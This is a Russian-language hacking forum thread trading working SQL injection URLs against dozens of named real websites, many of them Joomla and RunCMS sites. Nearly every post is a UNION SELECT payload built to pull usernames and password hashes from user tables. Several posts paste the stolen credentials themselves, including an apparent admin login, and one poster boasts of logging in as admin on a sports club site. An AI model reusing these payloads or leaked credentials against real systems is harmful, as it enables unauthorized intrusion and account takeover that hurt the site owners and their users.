SQL Инъекции

bag
http://www.gamingreport.com
http://www.worldnetdaily.com
БОЯН!!!
Отвечаю заепали, вам что лень посмотреть АНТИБОЯН?!

 

Code:

http://www.taminco.com/index.php?option=com_rekry&Itemid=119&rekryview=view&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--

SantiagoIrizarry:1876a90330b1c4a9e2aec571d0a2d54c

Code:

http://www.prastel.com/index.php?option=com_rekry&Itemid=105&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--

wappo:e6b2233d38f54b24e3fff99beef9b8e4

Code:

http://www.opelkomnenovic.co.yu/start/index.php?option=com_rekry&Itemid=111&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--

Pitanje : velisa:728a9a43f4d413c8bde3d34373b1da64

Code:

http://www.technespa.com/index.php?option=com_rekry&Itemid=145&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--

MuckeD:14ea4d7dd8c0acdc724c943fa9f942df

Code:

http://www.infotal.es/index.php?option=com_rekry&Itemid=37&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--

victor:57dbbe27ff919728e60e88a19bc4893a:U44IcyNPzRX4JI49

 

Code:

http://int.holinski-partners.com/index.php?option=com_neoreferences&Itemid=30&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*

Code:

http://www.thedesignconsultants.com/portfolio/12/index.php?option=com_neoreferences&Itemid=26&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*

Code:

http://www.foxrecruiting.co.uk/jobs/index.php?option=com_neoreferences&Itemid=41&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*

Code:

http://www.fotogram.nazwa.pl/fotogram/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Code:

http://poetycznie.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Code:

http://www.perureview.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

ппц название сайта)))))

Code:

http://www.verloskundigepraktijkhoogeveen.nl/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Code:

http://emavitos.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Code:

http://ftv.flameghana.org/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Code:

http://thevagrantverse.com/Joomla/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Code:

http://www.thewritersblox.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Code:

http://www.sanskimost.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Code:

http://www.getsatisfied.org/main/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Code:

http://www.prolocoferriere.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Code:

http://qarsak.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

Code:

http://www.teoria1.com/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

 

http://konkord.dp.ua/catalog.php?id=-7+union+select+1,2,3,4,Version(),6,7,8,9/*

4.0.27-standard-log

http://konkord.dp.ua/catalog.php?id=-7+union+select+1,2,3,4,database(),6,7,8,9/*

genixar_konkord

http://konkord.dp.ua/catalog.php?id=-7+union+select+1,2,3,4,user(),6,7,8,9/*

genixar_konkord@localhost

 

Поковырялся дальше...
http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,concat_ws(0x2A,login,pwd_hash,email),5,6,7+FROM+u15364.ra_users/*

 

Учебно-тренинговый центр (IPB)

http://rostov-trening.ru/index.php?act=program&pid=18&from=&id=-22+union+select+1,concat(user(),char(58),database(),char(58),version()),3,5,6,7,8,9,10,11/*

ayaks@localhost:ayks:4.1.22

 

Code:

http://www.dubus.by/modules/photo/viewcat.php?id=1015&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

Code:

http://www.poisk.slonim.org/modules/bamagalerie3/viewcat.php?id=31&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

Code:

http://emaximum.ru/modules/bamagalerie3/viewcat.php?id=82&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

Code:

http://www.megafizz.com/modules/bamagalerie3/viewcat.php?id=175&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

Code:

http://www.karadag.com.ua/modules/bamagalerie3/viewcat.php?id=96&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

Code:

http://www.cobra-tattoo.net/modules/photo/viewcat.php?id=14&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

 

SyBase

Code:

http://www.planetashop.ru/index.php?content=info&f_name=news_description&news_id=-1+union+select+@@version,2,3

 

Я решил поискать на сайтах других команд Российской суппер лиги и нашел инъекцию на сайте "Уфимского Салавата". Таблица с зарегестрированными, почти, 4к юзерами ... Правда попасть в админку мне не удалось, зато можно зайти на сайт под админом.

http://www.hcsalavat.ru/?show=1696%20and%200%20union%20select%201,2,concat_ws(0x3a,nick,pass,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20users%20limit%203965,1--

 

мoи первые sql-injection, я только учусь, прочитала статьи)))

http://www.globalfriendship.us/newsdetail.php?news_id=-4+union+select+1,table_name,3,4+from+information_schema.tables

http://www.jeanbaptiste.us/page.php?news_id=-6+union+select+1,version(),3,4,5,6

 

еще свежачек

Code:

http://ural-audit.info/index.php?option=com_alphacontent&section=5&cat=17&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
http://mp4club.ru/index.php?option=com_alphacontent&section=4&cat=21&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.eurotula.ru/index.php?option=com_alphacontent&section=11&cat=75&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.btlyar.ru/index.php?option=com_alphacontent&section=1&cat=2&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.napoliaffari.com/napoliaffari/index.php?option=com_alphacontent&section=8&cat=136&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.tribunjabar.co.id/post/postView.php?id=99999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10/*
http://www.moest.gov.np/postview.php?id=99999999999/**/UNION/**/SELECT/**/1,2,3,4/*
http://www.nepalgov.gov.np/postview.php?id=99999999/**/UNION/**/SELECT/**/1,2,3,4/

в падлу оформлять)

 

Извините ,но почему все смотрят сначала в information_schema.tables,а потом в ...columns... .Ведь во втором случае содержиться и то и другое(извините если что не так)
http://stargate.mgm.c0m/news_detail.php?series=1999999999+union+select+1,concat_ws(0x2A,table_schema,table_name,column_name),3,4,5,6,7,8,9+from+information_schema.columns/*

 

http://www.dressout.ru/novosty/?n=-10%20union%20select%201,2,3,4,5,6/*&subaction=detail
Вывод ошибок отключен, дальше не получается че то раскрутить..

 

http://www.cifracenter.ru/tovar.php?ID=2926%20and%200%20union%20select%201,2,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11%20from%20u42265.auth--

http://www.advocat-office.ru/index.php?cp=6%20and%200%20union%20select%201,2,3,4,5,6,concat_ws(0x3a,login,password,email,version()),8,9,10%20from%20users%20limit%203,1--

http://slovari.299.ru/word.php?id=34807%20and%200%20union%20select%20concat_ws(0x3a,password,email),null+from+u7138.User%20limit%200,1--

 

http://www.dako.ua/rus/novelties/?nid=-9999999999999+UNION+SELECT+1,2,3/*
user: dakosql@lo
database: dako
version: 4.0.13



http://hard.nov.ru/brands/A4-Tech/?id_new=-30+UNION+SELECT+1,2,3,4,5,6/*
user: root@localhost
database: hard
version: 5.0.22-log



http://sexshop-online.ru/index.php?part=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13/*
user: [email protected]
database: u91227
version: 5.0.45-log

 

_http://www.apt-rent.ru/catalog.php?view=-1+UNION+SELECT+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+information_schema.tables+LIMIT+16,1/*
От 16 и дальше имена таблиц
Одмин mi3d:ueLAIzNPZE

 

Вот что мне удалось раздобыть. Все таже жопла:

Code:

http://www.salsa-tonic.ru/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10+FROM+jos_users--

--------------

 

http://vsms.ru/show.php?show=news&id=-10+union+select+user()/*
http://www.mbstver.ru/res_1/streets/show.php?id=-10+union+select+user(),2,3,4/*

 

http://studsovet.ulsu.ru/index.php?pid=8&fac=-1+UNION+SELECT+1,2,3,4,5+FROM+null.user/*
Тока нимагу дальше расшарить((

 

2 Buffalon

Access denied for user 'studsovet'@'localhost' to database 'mysql'

Code:

http://studsovet.ulsu.ru/index.php?pid=8&fac=-1+UNION+SELECT+1,2,3,4,5+from+mysql.user/*

Нет прав на просмотр юзеров